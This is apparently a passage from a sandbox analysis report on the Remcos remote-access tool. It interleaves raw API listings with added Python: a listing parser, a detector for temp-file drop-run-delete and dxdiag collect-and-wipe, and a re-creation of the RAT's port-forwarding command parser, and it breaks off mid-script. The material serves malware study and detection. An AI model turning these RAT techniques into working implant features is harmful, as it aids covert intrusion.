                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                  • String ID: [regsplt]
                                  • API String ID: 2158026845-4262303796
                                  • Opcode ID: e88018d3548b0f6863b3603c9cd1a4df02fc79cc2db626b6e3283cfad48fe8a5
                                  • Instruction ID: 89d9bd96600c6e247975aaf8b0d3d97a5ae7f77b1b3f2a4fe7097baafbd20519
                                  • Opcode Fuzzy Hash: e88018d3548b0f6863b3603c9cd1a4df02fc79cc2db626b6e3283cfad48fe8a5
                                  • Instruction Fuzzy Hash: C971977290021EEBDB11DBD0DD89DEEBB7DEF48345F004166E606A2150EB745A89CFA8
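The two listings above, process enumeration through CreateToolhelp32Snapshot / Process32FirstW / Process32NextW (with OpenProcess reached through a helper) and registry enumeration through RegQueryInfoKeyW / RegEnumKeyExW / RegEnumValueW with results joined on the "[regsplt]" marker, are easier to read once the mangled MSVCP60 symbols are reduced to std::string and std::wstring operations and the Win32 calls are grouped per function. The following Python script is an added example, not part of the report and not Remcos code: it parses call lines in this report's format, demangles the C++ symbols heuristically, and maps each function's direct calls to capability labels. The rule table and its labels are the example's own choices, and SAMPLE is constructed from lines copied from the two listings.

```python
"""Triage helper for per-function API listings in the format shown above: parse
each "• Api.MODULE(args), ref: ADDR" line, reduce MSVC-mangled MSVCP60 symbols
to readable names, and map the API set of each function to a capability label.
Added example; it is neither sandbox code nor Remcos code.  The rule table and
its labels are this example's own choices; SAMPLE is built from lines copied
from the two listings above."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Special-member encodings of the MSVC name mangler, most specific first.
SPECIAL = [("??_D", "vbase_dtor"), ("??0", "ctor"), ("??1", "dtor"), ("??4", "operator="),
           ("??6", "operator<<"), ("??H", "operator+"), ("??Y", "operator+=")]
# Stream classes are checked before string so that operator<< is attributed to
# the stream rather than to the string it takes as an argument.
CLASSES = [("basic_ofstream@D", "std::ofstream"), ("basic_ostream@D", "std::ostream"),
           ("basic_string@D", "std::string"), ("basic_string@G", "std::wstring")]


def demangle(api: str) -> str:
    """Reduce an MSVC-mangled symbol to 'class::member'; plain Win32/CRT export
    names are returned unchanged."""
    if not api.startswith("?"):
        return api
    member = next((name for code, name in SPECIAL if api.startswith(code)), None)
    if member is None:
        member = f"operator{api[2]}" if api.startswith("??") else api[1:api.index("@")]
    cls = next((name for key, name in CLASSES if key in api), "std")
    return f"{cls}::{member}"


@dataclass
class Call:
    api: str                 # demangled name
    module: str
    args: List[str]
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the line describes an inner call


def parse_listing(text: str) -> List[List[Call]]:
    """Split the listing on its 'APIs' headers and parse each function's calls;
    lines that are not call lines (section headers, hashes) are skipped."""
    functions: List[List[Call]] = []
    current: List[Call] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            if current:
                functions.append(current)
            current = []
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        current.append(Call(api=demangle(m.group("api")), module=m.group("module"),
                            args=args, ref=int(m.group("ref"), 16),
                            subcall=int(m.group("subfn"), 16) if m.group("subfn") else None))
    if current:
        functions.append(current)
    return functions


# Each rule is a list of alternative sets; a function matches when every set is
# hit by at least one of its calls.
RULES = {
    "process enumeration (Toolhelp32)": [{"CreateToolhelp32Snapshot"},
                                         {"Process32FirstW", "Process32First"},
                                         {"Process32NextW", "Process32Next"}],
    "opens other processes": [{"OpenProcess"}],
    "registry enumeration": [{"RegEnumKeyExW", "RegEnumKeyExA"}, {"RegEnumValueW", "RegEnumValueA"}],
    "shell execution": [{"ShellExecuteExA", "ShellExecuteExW", "ShellExecuteA", "ShellExecuteW"}],
    "file deletion (cleanup)": [{"DeleteFileA", "DeleteFileW"}],
}


def capabilities(calls: List[Call], include_subcalls: bool = False) -> List[str]:
    """Rule names satisfied by this function.  Subcall lines belong to callees
    and are only counted when include_subcalls is set."""
    seen: Set[str] = {c.api for c in calls if include_subcalls or c.subcall is None}
    return [name for name, groups in RULES.items() if all(seen & g for g in groups)]


# Constructed sample: lines copied from the two listings above.
SAMPLE = """\
APIs
• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
  • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?), ref: 00412AFC
• CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
• Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
  • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
• CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 0040A0BF
Memory Dump Source
APIs
• RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
• RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
• RegEnumValueW.ADVAPI32 ref: 0040BC67
• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,0040BE7D,0040C731), ref: 0040BD27
"""

if __name__ == "__main__":
    for i, fn in enumerate(parse_listing(SAMPLE)):
        print(f"function {i}: {', '.join(capabilities(fn, include_subcalls=True)) or 'no rule hit'}")
```

Subcall lines are excluded by default on purpose: they describe what a helper does, so counting them inflates every caller of a shared string or process helper. Turn include_subcalls on when ranking functions for manual review and off when attributing a capability to a specific call site.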

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                  • getenv.MSVCRT ref: 0040EFDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                  • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                  • ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                  • CloseHandle.KERNEL32(?), ref: 0040F0D2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F116
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040F12E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F137
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F140
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040F149
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID: <$@$Temp
                                  • API String ID: 2271834883-1032778388
                                  • Opcode ID: 8129fc4212b973579658f375ac4c783a4d8b919b9fc52074d37d9b0a98dc69ef
                                  • Instruction ID: 888aea03b1af4e5dcc25ad03cf8797eeef26072084273f227dd45585e2e759a8
                                  • Opcode Fuzzy Hash: 8129fc4212b973579658f375ac4c783a4d8b919b9fc52074d37d9b0a98dc69ef
                                  • Instruction Fuzzy Hash: E541407190061DEBDB10EFE0DC4AAEE7B79EF44701F10403AF502A6190DBB45A89CF99

                                  APIs
                                  • _wgetenv.MSVCRT ref: 0040E93E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                  • API String ID: 1966616101-2001430897
                                  • Opcode ID: cdea80f22b2708bd3dc1142172b254446cbced2225aa351ee3707a6bb4051a2b
                                  • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                  • Opcode Fuzzy Hash: cdea80f22b2708bd3dc1142172b254446cbced2225aa351ee3707a6bb4051a2b
                                  • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
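The two functions above show the same drop-and-run pattern twice. The first resolves the Temp environment variable with getenv, writes a file there through std::ofstream, runs it with ShellExecuteExA, waits on the resulting handle with WaitForSingleObject, closes it and calls DeleteFileA. The second runs dxdiag through ShellExecuteW with "/t " followed by %temp%\sysinfo.txt, sleeps 100 ms (0x64), reads the report back with CreateFileW (GENERIC_READ, OPEN_EXISTING) and removes it with DeleteFileW. Because the artefact is gone before any on-demand scan sees it, the useful telemetry is the sequence file-create, process-create, file-delete, correlated on the creating process. The following Python is an added detection example written against constructed Sysmon-style events; it is neither sandbox output nor Remcos code, and the PIDs, paths and file names in SAMPLE_EVENTS are invented for the demonstration.

```python
"""Detection logic for the two behaviours listed above: a file written under
%Temp%, launched through the shell, waited on and deleted; and
'dxdiag /t %temp%\\sysinfo.txt' run to collect system information that is read
back and deleted a moment later.  Added example written against constructed
Sysmon-style events; it is neither sandbox output nor Remcos code.  The PIDs,
paths and file names in SAMPLE_EVENTS are made up for the demonstration."""
import ntpath
import re
from typing import Dict, List

Event = Dict[str, object]

# A file directly under a directory named Temp (%Temp%, %TMP%, C:\Windows\Temp).
TEMP_FILE_RE = re.compile(r"\\temp\\[^\\]+$", re.IGNORECASE)
# Output path of 'dxdiag /t <file>', quoted or not.
DXDIAG_OUT_RE = re.compile(r'/t\s+"?(?P<out>[^"]+?)"?\s*$', re.IGNORECASE)


def _is_temp_path(path: str) -> bool:
    return bool(TEMP_FILE_RE.search(path))


def detect_temp_script_drop(events: List[Event], window_s: float = 60.0) -> List[str]:
    """A process creates a file under Temp, a child of that process is started
    with the file on its command line, and the creator deletes the file, all
    within window_s seconds."""
    findings: List[str] = []
    created: Dict[tuple, float] = {}     # (pid, lower-cased path) -> creation time
    executed: set = set()
    for e in sorted(events, key=lambda x: x["t"]):
        if e["type"] == "FileCreate" and _is_temp_path(e["target"]):
            created[(e["pid"], e["target"].lower())] = e["t"]
        elif e["type"] == "ProcessCreate":
            for (pid, path), t0 in created.items():
                if pid == e["ppid"] and path in e["cmdline"].lower() and e["t"] - t0 <= window_s:
                    executed.add((pid, path))
        elif e["type"] == "FileDelete":
            key = (e["pid"], e["target"].lower())
            if key in executed and e["t"] - created[key] <= window_s:
                findings.append(f"pid {key[0]}: dropped, executed and removed "
                                f"{e['target']} within {e['t'] - created[key]:.1f}s")
    return findings


def detect_dxdiag_collection(events: List[Event], window_s: float = 60.0) -> List[str]:
    """'dxdiag /t <file>' writing under Temp; a second finding is raised when
    the parent deletes the report shortly afterwards (collect-and-wipe)."""
    findings: List[str] = []
    pending: Dict[tuple, float] = {}     # (parent pid, lower-cased report path) -> launch time
    for e in sorted(events, key=lambda x: x["t"]):
        if e["type"] == "ProcessCreate" and ntpath.basename(e["image"]).lower() == "dxdiag.exe":
            m = DXDIAG_OUT_RE.search(e["cmdline"])
            if m and _is_temp_path(m.group("out")):
                pending[(e["ppid"], m.group("out").lower())] = e["t"]
                findings.append(f"pid {e['ppid']}: ran dxdiag /t into Temp ({m.group('out')})")
        elif e["type"] == "FileDelete":
            key = (e["pid"], e["target"].lower())
            if key in pending and e["t"] - pending[key] <= window_s:
                findings.append(f"pid {e['pid']}: deleted dxdiag report {e['target']} "
                                f"{e['t'] - pending[key]:.1f}s after collection")
    return findings


def detect_all(events: List[Event]) -> List[str]:
    return detect_temp_script_drop(events) + detect_dxdiag_collection(events)


# Constructed events (made-up PIDs and paths) in the shape of Sysmon 11/1/23.
SAMPLE_EVENTS: List[Event] = [
    {"t": 10.0, "type": "FileCreate", "pid": 1234,
     "target": r"C:\Users\victim\AppData\Local\Temp\upd.bat"},
    {"t": 10.1, "type": "ProcessCreate", "pid": 2000, "ppid": 1234,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\System32\cmd.exe /c "C:\Users\victim\AppData\Local\Temp\upd.bat"'},
    {"t": 10.6, "type": "FileDelete", "pid": 1234,
     "target": r"C:\Users\victim\AppData\Local\Temp\upd.bat"},
    {"t": 20.0, "type": "ProcessCreate", "pid": 2100, "ppid": 1234,
     "image": r"C:\Windows\System32\dxdiag.exe",
     "cmdline": r"dxdiag /t C:\Users\victim\AppData\Local\Temp\sysinfo.txt"},
    {"t": 20.9, "type": "FileDelete", "pid": 1234,
     "target": r"C:\Users\victim\AppData\Local\Temp\sysinfo.txt"},
    # Benign noise: an installer writes to Temp but never executes or wipes it.
    {"t": 30.0, "type": "FileCreate", "pid": 900,
     "target": r"C:\Users\victim\AppData\Local\Temp\setup.log"},
]

if __name__ == "__main__":
    for finding in detect_all(SAMPLE_EVENTS):
        print(finding)
```

Both rules need file-delete telemetry (Sysmon event 23 or 26) in addition to process creation (event 1) and file creation (event 11); without the delete event the dxdiag rule still fires on the command line alone, but the dropped-script rule has nothing to correlate, since the file no longer exists by the time a scanner or a later hunt looks for it.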

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                  • SetEvent.KERNEL32(?), ref: 0040A38C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040A3AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • inet_ntoa.WS2_32 ref: 0040A41B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                  • atoi.MSVCRT ref: 0040A435
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                  • atoi.MSVCRT ref: 0040A479
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@inet_ntoa
                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                  • API String ID: 4095635200-168337528
                                  • Opcode ID: 9c6d9fadc52c293079f660d5c426c0b03e701870f787a23fd5a260a6c6d9362f
                                  • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                  • Opcode Fuzzy Hash: 9c6d9fadc52c293079f660d5c426c0b03e701870f787a23fd5a260a6c6d9362f
                                  • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
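The handler above copies the pending command string, signals an event, splits the command on a separator string held in the binary (helper 004129EB, a find/substr loop) and compares the verb against GetDirectListeningPort, StartForward, StartReverse, StopForward and StopReverse, using inet_ntoa for an address and atoi for the numeric fields. The following Python dispatcher is an added example modelled on that structure, not Remcos code: the separator (FIELD_SEP) and the field order verb, address, port are assumptions that the listing does not show, and the C atoi semantics are emulated rather than replaced by int() because they decide which malformed port fields such a handler silently accepts.

```python
"""Command dispatcher modelled on the port-forwarding handler listed above: the
handler splits the incoming command on a separator string, compares the verb
with GetDirectListeningPort / StartForward / StartReverse / StopForward /
StopReverse, and converts fields with inet_ntoa and atoi.  Added example, not
Remcos code.  FIELD_SEP and the field order (verb, address, port) are
assumptions; the listing does not show them.  atoi is emulated because
C atoi("80abc") is 80 and atoi("x") is 0, both of which int() would reject."""
import re
import socket
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

FIELD_SEP = "|"   # assumed; the real separator is a string constant in the binary
VERBS = {"GetDirectListeningPort", "StartForward", "StartReverse",
         "StopForward", "StopReverse"}
# Leading C-locale whitespace, optional sign, then digits; anything after is ignored.
_ATOI_RE = re.compile(r"^[ \t\n\v\f\r]*([+-]?\d+)")


def c_atoi(s: str) -> int:
    """C atoi semantics: skip leading whitespace and an optional sign, read
    digits, stop at the first non-digit, return 0 when there are none."""
    m = _ATOI_RE.match(s)
    return int(m.group(1)) if m else 0


def parse_ipv4(text: str) -> Optional[str]:
    """inet_aton/inet_ntoa round trip: only an IPv4 literal is accepted, there
    is no hostname lookup, and the result is in canonical dotted-quad form."""
    try:
        return socket.inet_ntoa(socket.inet_aton(text))
    except OSError:
        return None


@dataclass
class Command:
    verb: str
    host: Optional[str] = None
    port: Optional[int] = None


def parse_command(raw: str) -> Optional[Command]:
    """Return a validated Command, or None for anything the handler should ignore."""
    fields = raw.split(FIELD_SEP)
    verb = fields[0]
    if verb not in VERBS:
        return None
    if verb == "GetDirectListeningPort":
        return Command(verb)
    if len(fields) < 3:
        return None
    host = parse_ipv4(fields[1])
    port = c_atoi(fields[2])
    if host is None or not 0 < port < 65536:
        return None            # atoi returned 0 (no digits) or an out-of-range value
    return Command(verb, host, port)


@dataclass
class ForwardTable:
    """Active forwards keyed by (host, port); Start* adds one, Stop* removes it."""
    listening_port: int = 0
    active: Dict[Tuple[str, int], str] = field(default_factory=dict)

    def apply(self, cmd: Command) -> str:
        if cmd.verb == "GetDirectListeningPort":
            return f"listening_port={self.listening_port}"
        key = (cmd.host, cmd.port)
        if cmd.verb.startswith("Start"):
            kind = cmd.verb[len("Start"):].lower()     # "forward" or "reverse"
            self.active[key] = kind
            return f"started {kind} {cmd.host}:{cmd.port}"
        kind = cmd.verb[len("Stop"):].lower()
        if self.active.get(key) != kind:
            return f"no {kind} for {cmd.host}:{cmd.port}"
        del self.active[key]
        return f"stopped {kind} {cmd.host}:{cmd.port}"


if __name__ == "__main__":
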